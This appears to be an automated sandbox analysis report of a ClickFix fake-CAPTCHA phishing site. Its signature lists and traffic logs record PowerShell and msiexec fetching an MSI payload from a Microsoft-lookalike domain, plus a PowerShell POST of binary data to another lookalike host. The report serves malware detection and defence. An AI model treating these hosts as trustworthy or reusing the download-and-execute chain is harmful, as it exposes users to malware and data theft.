Windows Analysis Report
https://ggg-logistics.com/

General Information

Sample URL: https://ggg-logistics.com/
Analysis ID: 1702652
Infos: sigma

Detection

CAPTCHA Scam ClickFix
Score: 76
Range: 0 - 100
Confidence: 100%

Signatures

Yara detected CAPTCHA Scam ClickFix
HTML page adds supicious text to clipboard
HTML page contains suspicious base64 encoded javascript
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Suspicious powershell command line found
Writes or reads registry keys via WMI
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: MsiExec Web Install
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious MsiExec Embedding Parent
Suricata IDS alerts with low severity for network traffic
Too many similar processes found

Classification

Phishing
barindex
Yara detected CAPTCHA Scam ClickFix
Source: Yara match File source: 0.2.pages.csv, type: HTML
Source: Yara match File source: 0.1.pages.csv, type: HTML
HTML page contains suspicious base64 encoded javascript
Source: https://ggg-logistics.com/ HTTP Parser: Base64 decoded: <script>
Source: https://ggg-logistics.com/ HTTP Parser: Base64 decoded: <script>
Source: https://ggg-logistics.com/ HTTP Parser: Base64 decoded: <script>
HTML page contains hidden javascript code
Source: https://ggg-logistics.com/ HTTP Parser: Base64 decoded: ...
Source: C:\Windows\System32\msiexec.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A737E874-2CD8-4738-B38F-9986E7D8C9C9} Jump to behavior
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.28.254:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: Binary string: D:\a\_work\1\s\build\ship\x86\burn.pdb source: dotnet-sdk-8.0.408-win-x64.exe.20.dr
Source: Binary string: D:\a\_work\1\s\build\ship\x86\burn.pdb/ source: dotnet-sdk-8.0.408-win-x64.exe.20.dr
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\System32\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: e: Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: c:
Source: C:\Windows\System32\msiexec.exe File opened: a: Jump to behavior
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49720 -> 104.21.86.195:80
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 142.250.113.94
Source: unknown TCP traffic detected without corresponding DNS query: 142.250.113.94
Source: unknown TCP traffic detected without corresponding DNS query: 142.250.113.94
Source: unknown TCP traffic detected without corresponding DNS query: 142.250.113.94
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown TCP traffic detected without corresponding DNS query: 150.171.28.254
Source: unknown TCP traffic detected without corresponding DNS query: 150.171.28.254
Source: unknown TCP traffic detected without corresponding DNS query: 150.171.28.254
Source: unknown TCP traffic detected without corresponding DNS query: 150.171.28.254
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: global traffic HTTP traffic detected: GET / HTTP/1.1host: ggg-logistics.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6lt8uC+kTZE6A1l&MD=FrZuwvh7 HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6lt8uC+kTZE6A1l&MD=FrZuwvh7 HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /sign/cpt.msi HTTP/1.1host: dnsg-microsoftds-data.comaccept: */*user-agent: Windows Installer
Source: global traffic HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic HTTP traffic detected: GET /h8xiyPNTne HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: events-data-microsoft.liveConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: ggg-logistics.com
Source: global traffic DNS traffic detected: DNS query: dnsg-microsoftds-data.com
Source: global traffic DNS traffic detected: DNS query: events-data-microsoft.live
Source: global traffic DNS traffic detected: DNS query: windows-msn-cn.org
Source: unknown HTTP traffic detected: POST /5ktzQ4gu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/octet-streamHost: windows-msn-cn.orgContent-Length: 2250Connection: Keep-Alive
Source: dotnet-sdk-8.0.408-win-x64.exe.20.dr String found in binary or memory: http://appsyndication.org/2006/appsynapplicationd:
Source: MSI1640.tmp.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/
Source: 58adcc.rbs.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/$
Source: 58adcc.rbs.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/&
Source: ~DF98BBB0E23AFBBBE8.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1015567712311832210
Source: ~DF3D1D94328933181E.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1033227712311832210
Source: ~DF7A50F0BECDA30773.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1043537712311832210
Source: ~DF33F16A36E5D89BE5.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1053537712311832210
Source: ~DF06B2EC84FB19EF43.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1071507712311832210
Source: ~DF351ACE8053F70655.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1080877712311832210
Source: ~DFBD1424DD0C873C40.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1094787712311832210
Source: ~DF0342E85147403DCF.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1106977712311832210
Source: ~DF7558191626F94644.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1121977712311832210
Source: ~DF53E788A7273818D2.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1132127712311832210
Source: ~DFC7BB0FD8F0CD7E43.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1145097712311832210
Source: ~DF268BED1551C0C809.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1158847712311832210
Source: ~DF0C9E143A6E0CFB0A.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1170417712311832210
Source: ~DFAB4AAD2F61B7BE4C.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1180707712311832210
Source: ~DF643A85A5425C7D99.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1200547712311832210
Source: ~DF4D69041888ACABF2.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1212737712311832210
Source: ~DF82836FCB2617473A.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1225547712311832210
Source: ~DFE4AB33C0F7FE7109.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1235387712311832210
Source: ~DF187DD88DF0F443BD.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1246797712311832210
Source: ~DF4FD761B139B07E24.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-1569547712311832210
Source: ~DF57915A68AEDC5C19.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-915417712311832210
Source: ~DFBA32082EDF3507C6.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-924627712311832210
Source: ~DF603098CE0AB0A3DF.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-938227712311832210
Source: ~DF933E6C7D1787B4BD.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-956667712311832210
Source: ~DFC55C3E82A18C9E62.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-968377712311832210
Source: ~DF1D9183E82CF6E984.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-989007712311832210
Source: ~DF1D24EE58BC56FB38.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi-999007712311832210
Source: ~DF7CCB8E5AD1D47800.TMP.12.dr, ~DFB7E88B44DBCADE21.TMP.12.dr, ~DFC4233ADB1102091B.TMP.12.dr, ~DFDE0BFD6B31B99776.TMP.12.dr, ~DFBED3FC6B907E192A.TMP.12.dr, ~DF863F1D80E3D3B1FB.TMP.12.dr, ~DFAD00A4388854C47C.TMP.12.dr, ~DF6A184DD7E8DDA85B.TMP.12.dr, inprogressinstallinfo.ipi.12.dr, ~DFE1576488A7C5D445.TMP.12.dr, ~DFCBDF1D6A801BECAE.TMP.12.dr, ~DF19943193402F303A.TMP.12.dr, ~DF7D5774BA7A9861C0.TMP.12.dr, ~DF33F7ADEC987DCAFC.TMP.12.dr, ~DF5BEC298C4E79E0A3.TMP.12.dr, ~DF5100A453738C1B0C.TMP.12.dr, ~DF5FF2C1F0D53A9ABC.TMP.12.dr, ~DF195C2885D470EFB1.TMP.12.dr, ~DFBFD8D217DECCA73E.TMP.12.dr, ~DFDB2E1F92C41DD8A0.TMP.12.dr, ~DFA7D7BCF0D88BB204.TMP.12.dr String found in binary or memory: https://dnsg-microsoftds-data.com/sign/cpt.msi0C:
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49675
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.28.254:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.21:443 -> 192.168.2.5:49741 version: TLS 1.2
